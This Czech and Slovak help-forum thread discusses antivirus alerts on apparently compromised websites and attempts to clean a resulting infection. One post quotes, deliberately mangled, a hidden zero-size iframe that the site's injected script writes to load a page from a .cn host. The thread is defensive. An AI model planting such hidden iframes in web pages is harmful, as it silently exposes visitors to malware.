Vir,nebo falešný poplach
Avast mi nečekaně zahlásil vir na stránce,měla by to být seriozní stránka,žádný warez nebo něco podobného.Spojení jsem ukončil a protože jsem se s něčím takovým setkal poprvé,tak nevím zda může být i otevření nějaké stránky nebezpečné.Mělo by to být zde
www.goski.sk
Java script malware. Tady je taky BACHA, je tam opravdu, nejvyšší opatrnost! Neklikat kdo neví, jak se bránit!!: www.ultima.cz
ano,tam sa dokonca pokúša na pozadí spustiť súbor hipoint_dlt.com,a starý dobrý slammer,ktorý sa pokúša spúšťať inštanciu sql/msde
Aj NOD hlási Trojana
Na konci stranky je divny js, ale mne to ako virus nepripada.
Samotný JS není škodlivý, ale to, co vypíše už je na pováženou:
<iframe src="http: //polhfd 0.awasr.cn% 2C47index.ph p?out=120%2 C48094928" w%2 C105dth="0" 04eight="0 4></iframe >
Jsou tam malé chyby, dělal jsem to ručně, ale to, že to vypíše iframe vše vysvětluje.
U mna doslo k normalenmu redirectu na lanovky.sk a ziadny iframe sa nekonal.
Tak KAV nehlasi nic a normalne me tam pustil, tak ted jen doufam, ze to fakt nebyl vir.
Ty vado... Zapnu to a
dám delete a za deset minut znovu. Projedu v nouzovém režimu v Superantispyware, najde to 8 cookies, resetuji a zase. V po spuštění nic podezřelého...
Jdu mrknout na toho batif.tmp
Možná by stačil ComboFix nebo ten soubor ručně dohledat, popř. totálně vymazat Temp soubory a vůbec i Temporary Internet Files, tam je javascriptů hodně...
Ale copak jsme to chytili!?
A pak ať mi nikdo neříká o tom, že Avira je lepší než Avast, s Avastem no problem, nic v msconfigu, nic v tempech atd.
to máš nejakú divnú inštaláciu,podla obrázku máš neaktívnu volbu Repair,nejde Ti Avira v nejakom demo režime ? rekontroluj si pre istotu nastavenia programu
Něco se furt generuje. Něco bat*.tmp jdu to prozkoumat.
jestli to komunikuje ven, třeba kvůli stahování, zkus log svého obousměrného firewallu.
nějaký process explorer a výpis co se spouští po startu by taky mohly uspět.